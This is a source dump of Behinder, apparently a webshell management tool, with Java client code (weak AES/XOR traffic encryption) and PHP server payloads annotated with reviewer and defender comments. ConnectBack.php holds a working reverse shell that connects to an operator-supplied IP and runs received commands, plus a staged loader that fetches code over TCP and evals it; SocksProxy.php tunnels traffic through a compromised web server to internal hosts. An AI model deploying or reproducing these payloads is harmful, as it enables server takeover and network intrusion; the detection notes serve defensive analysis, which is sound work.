78 | } else if (location == StandardLocation.CLASS_PATH && kinds.contains(Kind.CLASS)) {
79 | return packageName.startsWith("java.") ? this.standardFileManager.list(location, packageName, kinds, recurse) : this.finder.find(packageName);
80 | } else {
81 | return Collections.emptyList();
82 | }
83 | }
84 |
// -1 tells the caller that the option is not supported by this file manager
85 | public int isSupportedOption(String option) {
86 | return -1;
87 | }
88 | }
89 |
--------------------------------------------------------------------------------
/src/main/java/net/rebeyond/behinder/core/Crypt.java:
--------------------------------------------------------------------------------
1 | package net.rebeyond.behinder.core;
2 |
3 | import net.rebeyond.behinder.utils.Base64;
4 |
5 | import javax.crypto.Cipher;
6 | import javax.crypto.spec.IvParameterSpec;
7 | import javax.crypto.spec.SecretKeySpec;
8 | import java.nio.charset.StandardCharsets;
9 |
// Transport encoding between the client and the server-side payloads, one variant per
// script family. In every variant the key string's bytes are used directly as key material.
// NOTE(review): none of these variants authenticates the data (no MAC or AEAD mode), and
// each has a further weakness noted on the method. For an analyst this means traffic can
// be decoded once the key is recovered from the server-side script or session, and that
// fixed plaintext produces repeatable ciphertext.
10 | public class Crypt {
11 | public Crypt() {
12 | }
13 |
// AES in ECB mode with PKCS5 padding; init mode 1 is Cipher.ENCRYPT_MODE.
// ECB is deterministic: equal plaintext blocks under one key give equal ciphertext blocks.
14 | public static byte[] Encrypt(byte[] bs, String key) throws Exception {
15 | byte[] raw = key.getBytes(StandardCharsets.UTF_8);
16 | SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
17 | Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
18 | cipher.init(1, skeySpec);
19 | return cipher.doFinal(bs);
20 | }
21 |
// Dispatches on the script type ("jsp", "php", "aspx", "asp"); encryptType is only used
// for "php". Returns null for any other type string.
22 | public static byte[] Decrypt(byte[] bs, String key, int encryptType, String type) throws Exception {
23 | byte[] result = null;
24 | switch (type) {
25 | case "jsp":
26 | result = DecryptForJava(bs, key);
27 | break;
28 | case "php":
29 | result = DecryptForPhp(bs, key, encryptType);
30 | break;
31 | case "aspx":
32 | result = DecryptForCSharp(bs, key);
33 | break;
34 | case "asp":
35 | result = DecryptForAsp(bs, key);
36 | break;
37 | }
38 |
39 | return result;
40 | }
41 |
// Inverse of Encrypt: AES/ECB/PKCS5Padding; init mode 2 is Cipher.DECRYPT_MODE
42 | public static byte[] DecryptForJava(byte[] bs, String key) throws Exception {
43 | byte[] raw = key.getBytes(StandardCharsets.UTF_8);
44 | SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
45 | Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
46 | cipher.init(2, skeySpec);
47 | return cipher.doFinal(bs);
48 | }
49 |
// AES/CBC/PKCS5Padding where the IV is the key bytes themselves, so the IV is fixed per
// key and is as secret (or as exposed) as the key
50 | public static byte[] EncryptForCSharp(byte[] bs, String key) throws Exception {
51 | byte[] raw = key.getBytes(StandardCharsets.UTF_8);
52 | IvParameterSpec iv = new IvParameterSpec(raw);
53 | SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
54 | Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
55 | cipher.init(1, skeySpec, iv);
56 | return cipher.doFinal(bs);
57 | }
58 |
// Inverse of EncryptForCSharp (same key-as-IV construction)
59 | public static byte[] DecryptForCSharp(byte[] bs, String key) throws Exception {
60 | byte[] raw = key.getBytes(StandardCharsets.UTF_8);
61 | IvParameterSpec iv = new IvParameterSpec(raw);
62 | SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
63 | Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
64 | cipher.init(2, skeySpec, iv);
65 | return cipher.doFinal(bs);
66 | }
67 |
// ENCRYPT_TYPE_AES: AES/CBC/PKCS5Padding with an all-zero 16-byte IV, so equal messages
// under one key produce equal ciphertext.
// ENCRYPT_TYPE_XOR: the repeating-key XOR of DecryptForAsp (XOR is its own inverse).
// Returns null for any other encryptType.
68 | public static byte[] EncryptForPhp(byte[] bs, String key, int encryptType) throws Exception {
69 | byte[] encrypted = null;
70 | if (encryptType == Constants.ENCRYPT_TYPE_AES) {
71 | byte[] raw = key.getBytes(StandardCharsets.UTF_8);
72 | SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
73 | Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
74 | cipher.init(1, skeySpec, new IvParameterSpec(new byte[]{0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}));
75 | encrypted = cipher.doFinal(bs);
76 | } else if (encryptType == Constants.ENCRYPT_TYPE_XOR) {
77 | encrypted = DecryptForAsp(bs, key);
78 | }
79 |
80 | return encrypted;
81 | }
82 |
// Repeating-key XOR: byte i is combined with key byte (i + 1) & 15, matching the
// (i And 15)+1 indexing of the ASP payload's Encrypt function.
// The input array is modified in place and the same array is returned.
// key.getBytes() uses the platform default charset here, unlike the UTF-8 used above,
// and is re-evaluated on every iteration.
// presumably the key is at least 16 bytes long - a shorter key would fail the index.
83 | public static byte[] EncryptForAsp(byte[] bs, String key) {
84 | for (int i = 0; i < bs.length; ++i) {
85 | bs[i] ^= key.getBytes()[i + 1 & 15];
86 | }
87 |
88 | return bs;
89 | }
90 |
// ENCRYPT_TYPE_AES: the input is first Base64-decoded (from a String built with the
// platform default charset), then decrypted with AES/CBC/PKCS5Padding and a zero IV.
// ENCRYPT_TYPE_XOR: repeating-key XOR via DecryptForAsp.
// Returns null for any other encryptType.
91 | public static byte[] DecryptForPhp(byte[] bs, String key, int encryptType) throws Exception {
92 | byte[] decrypted = null;
93 | if (encryptType == Constants.ENCRYPT_TYPE_AES) {
94 | byte[] raw = key.getBytes(StandardCharsets.UTF_8);
95 | bs = Base64.decode(new String(bs));
96 | SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
97 | Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
98 | cipher.init(2, skeySpec, new IvParameterSpec(new byte[]{0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}));
99 | decrypted = cipher.doFinal(bs);
100 | } else if (encryptType == Constants.ENCRYPT_TYPE_XOR) {
101 | decrypted = DecryptForAsp(bs, key);
102 | }
103 |
104 | return decrypted;
105 | }
106 |
// Same operation as EncryptForAsp: in-place XOR with key byte (i + 1) & 15
107 | public static byte[] DecryptForAsp(byte[] bs, String key) {
108 | for (int i = 0; i < bs.length; ++i) {
109 | bs[i] ^= key.getBytes()[i + 1 & 15];
110 | }
111 | return bs;
112 | }
113 | }
114 |
--------------------------------------------------------------------------------
/src/main/resources/net/rebeyond/behinder/payload/php/ConnectBack.php:
--------------------------------------------------------------------------------
// Payload preamble: turns off error reporting and removes the execution time limit, so
// the request leaves no PHP error output and is not cut off by max_execution_time.
1 | @error_reporting(0);
2 | @set_time_limit(0);
// Entry point: selects the connect-back variant for $type and passes $ip and $port on.
// NOTE(review): the second condition is an assignment ($type="meter"), not a comparison,
// so every $type other than "shell" reaches meter().
3 | function main($type,$ip,$port)
4 | {
5 | if ($type=="shell")
6 | {
7 | common($ip,$port);
8 | }
9 | else if ($type="meter")
10 | {
11 | meter($ip,$port);
12 | }
13 |
14 | }
15 |
// Staged loader: opens a TCP connection to $ip:$port (stream_socket_client, then
// fsockopen, then socket_create), reads a 4-byte big-endian length, reads that many bytes
// and executes them as PHP. Execution uses eval(), or create_function() when the suhosin
// extension has eval disabled.
// NOTE(review): the executed code arrives over the network at run time, so it never
// exists in the script file and static scanning of the webroot cannot see it.
// Defender notes: the observable behaviour is an outbound TCP connection initiated by the
// PHP worker. Egress filtering for the web tier blocks this path regardless of which
// socket function is available.
16 | function meter($ip,$port)
17 | {
18 | error_reporting(0);if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
19 | }
20 |
// Interactive connect-back loop: opens a TCP connection to $ip:$port (fsockopen, or the
// socket_* functions when fsockopen is not usable) and then, for each chunk of up to 2048
// bytes read from the socket:
//   "cd <dir>"        changes the working directory
//   "quit" / "exit"   ends the loop
//   anything else     is run as a shell command and its output is written back
// The last byte of each chunk (the line terminator) is stripped before use.
// The nested helper FYOQaKiyqQNfDO runs the command with the first usable function of
// popen, exec, passthru, proc_open, shell_exec and system; it returns 0 when none of them
// is usable.
// Defender notes: the observable behaviour is an outbound TCP connection from the PHP
// worker followed by shell child processes of the web server. The helper name and the
// literals 'no exec functions' and "socket_create" are fixed strings in this file.
21 | function common($ip,$port)
22 | {
23 | @error_reporting(0);
24 | @set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);
// disable_functions is split into an array so each function can be checked before use
25 | $dis=@ini_get('disable_functions');
26 | if(!empty($dis)){
27 | $dis=preg_replace('/[, ]+/', ',', $dis);
28 | $dis=explode(',', $dis);
29 | $dis=array_map('trim', $dis);
30 | }else{
31 | $dis=array();
32 | }
33 |
34 | $ipaddr=$ip;
35 |
36 | if(!function_exists('FYOQaKiyqQNfDO')){
37 | function FYOQaKiyqQNfDO($c){
38 | global $dis;
39 |
// on Windows, stderr is merged into stdout for the command
40 | if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
41 | $c=$c." 2>&1\n";
42 | }
// is_callable and in_array are invoked through variables holding their names
43 | $psCKsTH='is_callable';
44 | $PwRrt='in_array';
45 |
46 | if($psCKsTH('popen')and!$PwRrt('popen',$dis)){
47 | $fp=popen($c,'r');
48 | $o=NULL;
49 | if(is_resource($fp)){
50 | while(!feof($fp)){
51 | $o.=fread($fp,1024);
52 | }
53 | }
54 | @pclose($fp);
55 | }else
56 | if($psCKsTH('exec')and!$PwRrt('exec',$dis)){
57 | $o=array();
58 | exec($c,$o);
59 | $o=join(chr(10),$o).chr(10);
60 | }else
61 | if($psCKsTH('passthru')and!$PwRrt('passthru',$dis)){
62 | ob_start();
63 | passthru($c);
64 | $o=ob_get_contents();
65 | ob_end_clean();
66 | }else
67 | if($psCKsTH('proc_open')and!$PwRrt('proc_open',$dis)){
68 | $handle=proc_open($c,array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes);
69 | $o=NULL;
70 | while(!feof($pipes[1])){
71 | $o.=fread($pipes[1],1024);
72 | }
73 | @proc_close($handle);
74 | }else
75 | if($psCKsTH('shell_exec')and!$PwRrt('shell_exec',$dis)){
76 | $o=shell_exec($c);
77 | }else
78 | if($psCKsTH('system')and!$PwRrt('system',$dis)){
79 | ob_start();
80 | system($c);
81 | $o=ob_get_contents();
82 | ob_end_clean();
83 | }else
84 | {
85 | $o=0;
86 | }
87 |
88 | return $o;
89 | }
90 | }
91 | $nofuncs='no exec functions';
// first transport: fsockopen stream
92 | if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
93 | $s=@fsockopen("tcp://".$ip,$port);
94 | while($c=fread($s,2048)){
95 | $out = '';
96 | if(substr($c,0,3) == 'cd '){
97 | chdir(substr($c,3,-1));
98 | } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
99 | break;
100 | }else{
101 | $out=FYOQaKiyqQNfDO(substr($c,0,-1));
102 | if($out===false){
103 | fwrite($s,$nofuncs);
104 | break;
105 | }
106 | }
107 | fwrite($s,$out);
108 | }
109 | fclose($s);
110 | }else{
// second transport: raw socket_* functions; the literal "socket_create" is sent first
111 | $s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
112 | @socket_connect($s,$ipaddr,$port);
113 | @socket_write($s,"socket_create");
114 | while($c=@socket_read($s,2048)){
115 | $out = '';
116 | if(substr($c,0,3) == 'cd '){
117 | chdir(substr($c,3,-1));
118 | } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
119 | break;
120 | }else{
121 | $out=FYOQaKiyqQNfDO(substr($c,0,-1));
122 | if($out===false){
123 | @socket_write($s,$nofuncs);
124 | break;
125 | }
126 | }
127 | @socket_write($s,$out,strlen($out));
128 | }
129 | @socket_close($s);
130 | }
131 | }
--------------------------------------------------------------------------------
/src/main/java/net/rebeyond/behinder/ui/DatabaseView.fxml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/src/main/resources/net/rebeyond/behinder/ui/DatabaseView.fxml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/src/main/java/net/rebeyond/behinder/ui/ReverseViewTab.fxml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/src/main/resources/net/rebeyond/behinder/ui/ReverseViewTab.fxml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/src/main/java/net/rebeyond/behinder/utils/jc/PackageInternalsFinder.java:
--------------------------------------------------------------------------------
1 | package net.rebeyond.behinder.utils.jc;
2 |
3 | import java.io.File;
4 | import java.io.IOException;
5 | import java.net.JarURLConnection;
6 | import java.net.URI;
7 | import java.net.URL;
8 | import java.util.ArrayList;
9 | import java.util.Collection;
10 | import java.util.Enumeration;
11 | import java.util.List;
12 | import java.util.jar.JarEntry;
13 |
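/**
 * Enumerates the {@code .class} files that sit directly inside a package (not in
 * its sub-packages) on a class loader's resource path and wraps each one in a
 * {@code CustomJavaFileObject}.
 *
 * Only resource URLs whose string form starts with {@code "jar"} are considered
 * by {@link #find(String)}.
 */
public class PackageInternalsFinder {
    private final ClassLoader classLoader;
    private static final String CLASS_FILE_EXTENSION = ".class";

    /**
     * @param classLoader loader whose resources are searched
     */
    public PackageInternalsFinder(ClassLoader classLoader) {
        this.classLoader = classLoader;
    }

    /**
     * Lists the classes directly contained in {@code packageName}.
     *
     * @param packageName dotted package name, e.g. {@code java.util}
     * @return list of {@code CustomJavaFileObject}; empty when nothing matches
     * @throws IOException if the class loader cannot enumerate its resources
     */
    public List find(String packageName) throws IOException {
        String javaPackageName = packageName.replace('.', '/');
        List result = new ArrayList();
        Enumeration<URL> packageUrls = this.classLoader.getResources(javaPackageName);

        while (packageUrls.hasMoreElements()) {
            URL packageFolderURL = packageUrls.nextElement();
            if (packageFolderURL.toString().startsWith("jar")) {
                result.addAll(this.listUnder(packageName, packageFolderURL));
            }
        }

        return result;
    }

    /** Dispatches to the directory or jar listing depending on what the URL's file part points at. */
    private Collection listUnder(String packageName, URL packageFolderURL) {
        File directory = new File(packageFolderURL.getFile());
        return directory.isDirectory() ? this.processDir(packageName, directory) : this.processJar(packageFolderURL);
    }

    /** Lists the package's classes from a jar URL and turns off the default URLConnection cache flag afterwards. */
    private List processJar(URL packageFolderURL) {
        return this.listJarClasses(packageFolderURL, true);
    }

    /** Same listing as {@link #processJar(URL)} but leaves the default cache flag untouched. */
    private List processRsrc(URL packageFolderURL) {
        return this.listJarClasses(packageFolderURL, false);
    }

    /**
     * Shared jar walk behind processJar and processRsrc, which previously carried two copies of this loop.
     *
     * @param packageFolderURL      jar: URL of the package folder
     * @param disableDefaultCaches  whether to call setDefaultUseCaches(false) once the walk is done
     * @throws RuntimeException wrapping any failure to open or read the jar
     */
    private List listJarClasses(URL packageFolderURL, boolean disableDefaultCaches) {
        List result = new ArrayList();

        try {
            String jarUri = packageFolderURL.toExternalForm().split("!")[0];
            JarURLConnection jarConn = (JarURLConnection) packageFolderURL.openConnection();
            String rootEntryName = jarConn.getEntryName();
            // Position just past "<root>/": a further '/' after it means the entry is in a sub-package.
            int rootEnd = rootEntryName.length() + 1;
            Enumeration<JarEntry> entries = jarConn.getJarFile().entries();

            while (entries.hasMoreElements()) {
                String name = entries.nextElement().getName();
                if (name.startsWith(rootEntryName) && name.indexOf('/', rootEnd) == -1 && name.endsWith(CLASS_FILE_EXTENSION)) {
                    URI uri = URI.create(jarUri + "!/" + name);
                    result.add(new CustomJavaFileObject(stripClassSuffix(name.replace('/', '.')), uri));
                }
            }

            if (disableDefaultCaches) {
                jarConn.setDefaultUseCaches(false);
            }
            return result;
        } catch (Exception e) {
            throw new RuntimeException("Wasn't able to open " + packageFolderURL + " as a jar file", e);
        }
    }

    /** Lists the classes that are plain files directly inside {@code directory}. */
    private List processDir(String packageName, File directory) {
        List result = new ArrayList();
        File[] childFiles = directory.listFiles();
        if (childFiles == null) {
            // listFiles() returns null on an I/O error or when the path stopped being a directory.
            return result;
        }

        for (File childFile : childFiles) {
            if (childFile.isFile() && childFile.getName().endsWith(CLASS_FILE_EXTENSION)) {
                String binaryName = stripClassSuffix(packageName + "." + childFile.getName());
                result.add(new CustomJavaFileObject(binaryName, childFile.toURI()));
            }
        }

        return result;
    }

    /** Drops a trailing ".class"; the former regex ".class$" left its dot unescaped. */
    private static String stripClassSuffix(String name) {
        return name.endsWith(CLASS_FILE_EXTENSION)
                ? name.substring(0, name.length() - CLASS_FILE_EXTENSION.length())
                : name;
    }
}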
115 |
--------------------------------------------------------------------------------
/src/main/resources/net/rebeyond/behinder/payload/php/SocksProxy.php:
--------------------------------------------------------------------------------
@error_reporting(0);
/**
 * Server-side half of an HTTP-tunnelled TCP relay. One POST with $cmd "CONNECT"
 * opens a socket to $targetIP:$targetPort and keeps the PHP worker looping;
 * later POSTs with "FORWARD" and "READ" move bytes to and from that socket
 * through the PHP session; "DISCONNECT" stops the loop.
 *
 * Defender view:
 *  - State lives in the session under the keys "run", "writebuf" and "readbuf".
 *    The session store is rewritten on every loop iteration.
 *  - The CONNECT request's worker outlives its HTTP response and holds an
 *    outbound socket, typically toward an internal address. A web worker with
 *    long-lived connections to hosts it never normally talks to is the signal.
 *  - Every failure message is prefixed with the fixed four bytes
 *    0x37 0x21 0x49 0x36 ("7!I6").
 *  - DISCONNECT writes the line "DISCONNECT recieved" to the PHP error log.
 *
 * @param string $cmd        One of CONNECT, DISCONNECT, READ, FORWARD.
 * @param string $targetIP   Destination host for CONNECT.
 * @param string $targetPort Destination port for CONNECT (cast to int).
 * @param string $extraData  Base64 payload for FORWARD; the default decodes to "123".
 */
function main($cmd,$targetIP="",$targetPort="",$extraData="MTIz")
{
    ini_set("allow_url_fopen", true);
    ini_set("allow_url_include", true);
    // Tries to load the sockets extension at runtime where dl() is still available.
    if (function_exists('dl'))
    {
        dl("php_sockets.dll");
    }
    // Polyfill for SAPIs without apache_request_headers(): rebuild header names from $_SERVER's HTTP_* keys.
    if( !function_exists('apache_request_headers') ) {
        function apache_request_headers() {
            $arh = array();
            $rx_http = '/\AHTTP_/';

            foreach($_SERVER as $key => $val) {
                if( preg_match($rx_http, $key) ) {
                    $arh_key = preg_replace($rx_http, '', $key);
                    $rx_matches = array();
                    $rx_matches = explode('_', $arh_key);
                    if( count($rx_matches) > 0 and strlen($arh_key) > 2 ) {
                        foreach($rx_matches as $ak_key => $ak_val) {
                            $rx_matches[$ak_key] = ucfirst($ak_val);
                        }

                        $arh_key = implode('-', $rx_matches);
                    }
                    $arh[$arh_key] = $val;
                }
            }
            return( $arh );
        }
    }


    // Only POST requests are acted on.
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        set_time_limit(0);
        // Collected but not read again in this function.
        $headers=apache_request_headers();
        switch($cmd){
            case "CONNECT":
                {
                    $target = $targetIP;
                    $port = (int)$targetPort;
                    $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
                    if ($sock === false)
                    {
                        echo "\x37\x21\x49\x36Failed creating socket";
                        return;
                    }
                    $res = @socket_connect($sock, $target, $port);
                    if ($res === false)
                    {
                        echo "\x37\x21\x49\x36Failed connecting to target";
                        return;
                    }
                    socket_set_nonblock($sock);
                    @session_start();
                    $_SESSION["run"] = true;
                    $_SESSION["writebuf"] = "";
                    $_SESSION["readbuf"] = "";
                    // Finish the HTTP response now (empty body, Connection: close)
                    // while the script keeps running as the relay loop.
                    ob_end_clean();
                    header("Connection: close");
                    ignore_user_abort();
                    ob_start();
                    $size = ob_get_length();
                    header("Content-Length: $size");
                    ob_end_flush();
                    flush();
                    session_write_close();

                    // Relay loop: session -> socket, then socket -> session, until "run" is cleared.
                    while ($_SESSION["run"])
                    {
                        $readBuff = "";
                        @session_start();
                        $writeBuff = $_SESSION["writebuf"];
                        $_SESSION["writebuf"] = "";
                        session_write_close();
                        if ($writeBuff != "")
                        {
                            $i = socket_write($sock, $writeBuff, strlen($writeBuff));
                            if($i === false)
                            {
                                @session_start();
                                $_SESSION["run"] = false;
                                session_write_close();
                                echo "\x37\x21\x49\x36Failed writing socket";
                            }
                        }
                        // Drain whatever the non-blocking socket has, 512 bytes at a time.
                        while ($o = socket_read($sock, 512)) {
                            // The loop condition already exits on false, so this branch is not reached.
                            if($o === false)
                            {
                                @session_start();
                                $_SESSION["run"] = false;
                                session_write_close();
                                echo "\x37\x21\x49\x36Failed reading from socket";
                            }
                            $readBuff .= $o;
                        }
                        if ($readBuff!=""){
                            @session_start();
                            $_SESSION["readbuf"] .= $readBuff;
                            session_write_close();
                        }
                        // With the delay commented out the loop polls the session store
                        // without pause, which shows up as CPU and session-file churn.
                        #sleep(0.2);
                    }
                    socket_close($sock);
                }
                break;
            case "DISCONNECT":
                {
                    // Leaves a line in the PHP error log.
                    error_log("DISCONNECT recieved");
                    @session_start();
                    $_SESSION["run"] = false;
                    session_write_close();
                    return;
                }
                break;
            case "READ":
                {
                    // Hand back and clear whatever the relay loop has buffered from the target.
                    @session_start();
                    $readBuffer = $_SESSION["readbuf"];
                    $_SESSION["readbuf"]="";
                    $running = $_SESSION["run"];
                    session_write_close();
                    if ($running) {
                        header("Connection: Keep-Alive");
                        echo $readBuffer;
                        return;
                    } else {
                        echo "\x37\x21\x49\x36RemoteSocket read filed";
                        return;
                    }
                }
                break;
            case "FORWARD":
                {
                    @session_start();
                    $running = $_SESSION["run"];
                    session_write_close();
                    if(!$running){
                        echo "\x37\x21\x49\x36No more running, close now";
                        return;
                    }
                    header('Content-Type: application/octet-stream');
                    // Decoded bytes are queued for the relay loop to write to the target socket.
                    $rawPostData = base64_decode($extraData);
                    if ($rawPostData) {
                        @session_start();
                        $_SESSION["writebuf"] .= $rawPostData;
                        session_write_close();
                        header("Connection: Keep-Alive");
                        return;
                    } else {
                        echo "\x37\x21\x49\x36POST request read filed";
                    }
                }
                break;
        }
    }
}
--------------------------------------------------------------------------------
/src/main/java/net/rebeyond/behinder/ui/FileManagerViewTab.fxml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/src/main/resources/net/rebeyond/behinder/ui/FileManagerViewTab.fxml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/gradlew:
--------------------------------------------------------------------------------
#!/usr/bin/env sh

##############################################################################
##
##  Gradle start up script for UN*X
##
##############################################################################

# What this script does: resolves the project directory, picks a java
# executable, and runs org.gradle.wrapper.GradleWrapperMain from
# gradle/wrapper/gradle-wrapper.jar with the caller's arguments.
#
# Supply-chain note: the wrapper jar is a binary committed to the repository and
# is executed as-is on every build. Review changes to it like any other
# executable and compare its checksum with the one Gradle publishes for the
# wrapper version in use. Pinning distributionSha256Sum in
# gradle-wrapper.properties does the same for the distribution it downloads.

# Attempt to set APP_HOME
# Resolve links: $0 may be a link
PRG="$0"
# Need this for relative symlinks.
while [ -h "$PRG" ] ; do
    ls=`ls -ld "$PRG"`
    link=`expr "$ls" : '.*-> \(.*\)$'`
    if expr "$link" : '/.*' > /dev/null; then
        PRG="$link"
    else
        PRG=`dirname "$PRG"`"/$link"
    fi
done
SAVED="`pwd`"
cd "`dirname \"$PRG\"`/" >/dev/null
APP_HOME="`pwd -P`"
cd "$SAVED" >/dev/null

APP_NAME="Gradle"
APP_BASE_NAME=`basename "$0"`

# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script.
DEFAULT_JVM_OPTS=""

# Use the maximum available, or set MAX_FD != -1 to use that value.
MAX_FD="maximum"

# Print a message and continue.
warn () {
    echo "$*"
}

# Print a message framed by blank lines and exit with status 1.
die () {
    echo
    echo "$*"
    echo
    exit 1
}

# OS specific support (must be 'true' or 'false').
cygwin=false
msys=false
darwin=false
nonstop=false
case "`uname`" in
  CYGWIN* )
    cygwin=true
    ;;
  Darwin* )
    darwin=true
    ;;
  MINGW* )
    msys=true
    ;;
  NONSTOP* )
    nonstop=true
    ;;
esac

# The only classpath entry is the committed wrapper jar (see the supply-chain note at the top).
CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar

# Determine the Java command to use to start the JVM.
# JAVA_HOME, when set, decides which binary is executed. Otherwise the first
# 'java' on PATH is used, so both are trusted inputs to the build.
if [ -n "$JAVA_HOME" ] ; then
    if [ -x "$JAVA_HOME/jre/sh/java" ] ; then
        # IBM's JDK on AIX uses strange locations for the executables
        JAVACMD="$JAVA_HOME/jre/sh/java"
    else
        JAVACMD="$JAVA_HOME/bin/java"
    fi
    if [ ! -x "$JAVACMD" ] ; then
        die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME

Please set the JAVA_HOME variable in your environment to match the
location of your Java installation."
    fi
else
    JAVACMD="java"
    which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH.

Please set the JAVA_HOME variable in your environment to match the
location of your Java installation."
fi

# Increase the maximum file descriptors if we can.
if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then
    MAX_FD_LIMIT=`ulimit -H -n`
    if [ $? -eq 0 ] ; then
        if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then
            MAX_FD="$MAX_FD_LIMIT"
        fi
        ulimit -n $MAX_FD
        if [ $? -ne 0 ] ; then
            warn "Could not set maximum file descriptor limit: $MAX_FD"
        fi
    else
        warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT"
    fi
fi

# For Darwin, add options to specify how the application appears in the dock
if $darwin; then
    GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\""
fi

# For Cygwin, switch paths to Windows format before running java
if $cygwin ; then
    APP_HOME=`cygpath --path --mixed "$APP_HOME"`
    CLASSPATH=`cygpath --path --mixed "$CLASSPATH"`
    JAVACMD=`cygpath --unix "$JAVACMD"`

    # We build the pattern for arguments to be converted via cygpath
    ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null`
    SEP=""
    for dir in $ROOTDIRSRAW ; do
        ROOTDIRS="$ROOTDIRS$SEP$dir"
        SEP="|"
    done
    OURCYGPATTERN="(^($ROOTDIRS))"
    # Add a user-defined pattern to the cygpath arguments
    if [ "$GRADLE_CYGPATTERN" != "" ] ; then
        OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)"
    fi
    # Now convert the arguments - kludge to limit ourselves to /bin/sh
    # Each argument is assigned through eval, so argument text is re-parsed by the shell here.
    i=0
    for arg in "$@" ; do
        CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -`
        CHECK2=`echo "$arg"|egrep -c "^-"`                                 ### Determine if an option

        if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then                    ### Added a condition
            eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"`
        else
            eval `echo args$i`="\"$arg\""
        fi
        i=$((i+1))
    done
    case $i in
        (0) set -- ;;
        (1) set -- "$args0" ;;
        (2) set -- "$args0" "$args1" ;;
        (3) set -- "$args0" "$args1" "$args2" ;;
        (4) set -- "$args0" "$args1" "$args2" "$args3" ;;
        (5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;;
        (6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;;
        (7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;;
        (8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;;
        (9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;;
    esac
fi

# Escape application args
# Wraps every argument in single quotes (embedded quotes escaped) so the eval below re-reads them verbatim.
save () {
    for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done
    echo " "
}
APP_ARGS=$(save "$@")

# Collect all arguments for the java command, following the shell quoting and substitution rules
# JAVA_OPTS and GRADLE_OPTS are expanded unquoted inside eval: shell syntax placed
# in those environment variables is executed by this script. Treat them as trusted
# configuration, including when they are set from CI variables.
eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS"

# by default we should be in the correct project dir, but when run from Finder on Mac, the cwd is wrong
if [ "$(uname)" = "Darwin" ] && [ "$HOME" = "$PWD" ]; then
  cd "$(dirname "$0")"
fi

exec "$JAVACMD" "$@"
173 |
--------------------------------------------------------------------------------
/src/main/java/net/rebeyond/behinder/utils/ZipUtil.java:
--------------------------------------------------------------------------------
